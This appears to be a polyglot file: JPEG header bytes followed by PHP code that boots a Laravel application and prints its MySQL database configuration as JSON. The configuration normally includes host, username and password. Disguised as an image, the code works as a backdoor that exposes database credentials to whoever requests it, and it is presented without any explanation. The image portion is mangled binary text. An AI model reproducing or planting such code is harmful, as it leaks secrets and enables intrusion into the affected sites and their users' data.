JFIFxxC      C  " }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbrmake(Illuminate\Contracts\Http\Kernel::class); // Create a request instance $request = Illuminate\Http\Request::capture(); // Handle the request and get the response $response = $kernel->handle($request); // Get the database configuration $dbConfig = config('database.connections.mysql'); // Output the database configuration as JSON header('Content-Type: application/json'); echo json_encode($dbConfig, JSON_PRETTY_PRINT); // Terminate the application $kernel->terminate($request, $response);